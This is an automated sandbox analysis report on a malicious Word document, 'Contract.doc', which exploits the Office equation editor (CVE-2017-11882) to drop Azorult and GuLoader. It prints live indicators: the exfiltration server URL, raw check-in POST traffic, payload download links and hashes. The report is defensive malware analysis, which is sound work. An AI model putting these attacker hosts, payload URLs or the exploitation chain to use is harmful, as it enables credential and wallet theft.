Loading ...

Play interactive tourEdit tour

Analysis Report Contract.doc

Overview

General Information

Sample Name:Contract.doc
Analysis ID:288499
MD5:dc817d20bf5493c1d8da1cc922676608
SHA1:dcd1ef30f1b0e3d13df459c458b0211e3a424613
SHA256:79b3d9bfe6c97a51d65ff4b458b82c1afa8bff5f7a273f2248e37dffe0cdc89a
Tags:doc

Most interesting Screenshot:

Detection

Azorult GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1948 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2412 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • hjdegydbhk.exe (PID: 2488 cmdline: C:\Users\user\AppData\Roaming\hjdegydbhk.exe MD5: 87C9AB14C3851591C94AD24D94E6A7DD)
      • hjdegydbhk.exe (PID: 2508 cmdline: C:\Users\user\AppData\Roaming\hjdegydbhk.exe MD5: 87C9AB14C3851591C94AD24D94E6A7DD)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.2137580410.00000000202A0000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
    00000005.00000003.2138848101.000000001F4D0000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000005.00000003.2139429769.0000000020270000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
        00000005.00000002.2139679686.00000000001B0000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
          00000005.00000003.2137593447.000000001FE70000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
            Click to see the 5 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\hjdegydbhk.exe, CommandLine: C:\Users\user\AppData\Roaming\hjdegydbhk.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hjdegydbhk.exe, NewProcessName: C:\Users\user\AppData\Roaming\hjdegydbhk.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hjdegydbhk.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: C:\Users\user\AppData\Roaming\hjdegydbhk.exe, ProcessId: 2488
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2412, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscre[1].exe

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: Contract.docAvira: detected
            Multi AV Scanner detection for domain / URLShow sources
            Source: officestore.co.idVirustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscre[1].exeVirustotal: Detection: 44%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: Contract.docVirustotal: Detection: 44%Perma Link
            Source: Contract.docReversingLabs: Detection: 44%

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hjdegydbhk.exeJump to behavior
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: global trafficDNS query: name: www.uttaranchaltoday.com
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.28.1.185:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.28.1.185:443

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49170 -> 103.247.10.55:80
            Source: TrafficSnort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.22:49170
            Source: TrafficSnort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49171 -> 103.247.10.55:80
            Source: Joe Sandbox ViewASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: global trafficHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 3b 70 9d 30 13 eb 26 66 9a 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 96 40 70 9d 32 70 9d 3b 70 9d 35 11 8b 30 65 8b 30 62 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp;p0&f&f&f&f&g&f@p2p;p50e0b
            Source: global trafficHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 80084Cache-Control: no-cache
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24B54A00-30CA-4646-ACFF-79FC9E14ADCB}.tmpJump to behavior
            Source: hjdegydbhk.exe, 00000005.00000002.2139785125.00000000005EC000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
            Source: hjdegydbhk.exe, 00000005.00000002.2139785125.00000000005EC000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
            Source: hjdegydbhk.exe, 00000005.00000002.2139819524.000000000062A000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: unknownDNS traffic detected: queries for: www.uttaranchaltoday.com
            Source: unknownHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 3b 70 9d 30 13 eb 26 66 9a 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 96 40 70 9d 32 70 9d 3b 70 9d 35 11 8b 30 65 8b 30 62 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp;p0&f&f&f&f&g&f@p2p;p50e0b
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: hjdegydbhk.exe, 00000005.00000002.2139819524.000000000062A000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: hjdegydbhk.exe, 00000005.00000002.2139819524.000000000062A000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: hjdegydbhk.exe, 00000004.00000002.2103881982.0000000003177000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: hjdegydbhk.exe, 00000004.00000002.2103881982.0000000003177000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: hjdegydbhk.exe, 00000005.00000002.2139819524.000000000062A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: hjdegydbhk.exe, 00000005.00000002.2139819524.000000000062A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ocsp.thawte.com0
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://officestore.co.id/linkzer/PL341/index.php
            Source: hjdegydbhk.exe, 00000005.00000002.2143209643.000000001E440000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: hjdegydbhk.exe, 00000004.00000002.2103881982.0000000003177000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: hjdegydbhk.exe, 00000004.00000002.2103881982.0000000003177000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: hjdegydbhk.exe, 00000005.00000002.2143209643.000000001E440000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: hjdegydbhk.exe, 00000005.00000002.2139819524.000000000062A000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: hjdegydbhk.exe, 00000004.00000002.2103881982.0000000003177000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com0
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: https://gysc9q.bl.files.1drv.com/
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp, hjdegydbhk.exe, 00000005.00000002.2139785125.00000000005EC000.00000004.00000020.sdmpString found in binary or memory: https://gysc9q.bl.files.1drv.com/y4mzx_E9xBIyaAWstdZ_AKWk7_4uY1-LIrkBkeqCoIHMHpALNVPeoN7gEqc2K090OVA
            Source: hjdegydbhk.exe, 00000005.00000002.2139775413.00000000005DB000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/G
            Source: hjdegydbhk.exe, 00000005.00000002.2139775413.00000000005DB000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/O
            Source: hjdegydbhk.exe, 00000005.00000002.2139785125.00000000005EC000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21175&authkey=AD2-9NY
            Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: 68106295534377010496264.tmp.5.drString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0j46j0l2j46j0j5.485j0j8&sourceid=chro
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
            Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

            System Summary:

            barindex
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\hjdegydbhk.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscre[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B3C71 NtResumeThread,4_2_003B3C71
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B02EF EnumWindows,NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_003B02EF
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B1727 NtWriteVirtualMemory,4_2_003B1727
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B391A NtProtectVirtualMemory,4_2_003B391A
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B35B3 NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_003B35B3
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B3C93 NtResumeThread,4_2_003B3C93
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B3CEA NtResumeThread,4_2_003B3CEA
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B28CA NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_003B28CA
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B3D3A NtResumeThread,4_2_003B3D3A
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B0330 NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_003B0330
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B192E NtWriteVirtualMemory,4_2_003B192E
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B037B NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_003B037B
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B3D81 NtResumeThread,4_2_003B3D81
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 4_2_003B17CB NtWriteVirtualMemory,4_2_003B17CB
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_000612045_3_00061204
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_000612045_3_00061204
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_00085C005_3_00085C00
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_0008521A5_3_0008521A
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_000838205_3_00083820
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_0008363A5_3_0008363A
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_00084C325_3_00084C32
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_00083C425_3_00083C42
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_000854545_3_00085454
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_00085C545_3_00085C54
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_000844735_3_00084473
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_000840885_3_00084088
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_00085E8C5_3_00085E8C
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_00084CAC5_3_00084CAC
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_00083CA45_3_00083CA4
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_00085CBB5_3_00085CBB
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_000834C25_3_000834C2
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_000852DA5_3_000852DA
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_00082EDE5_3_00082EDE
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_000814D45_3_000814D4
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_00084CF85_3_00084CF8
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_000856FA5_3_000856FA
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeCode function: 5_3_000860FA5_3_000860FA
            Source: linkscre[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: hjdegydbhk.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.5.drStatic PE information: No import functions for PE file found
            Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@6/61@4/2
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ntract.docJump to behavior
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeMutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-83FE4133-8C186D07
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD384.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
            Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
            Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
            Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
            Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
            Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
            Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s;
            Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
            Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
            Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
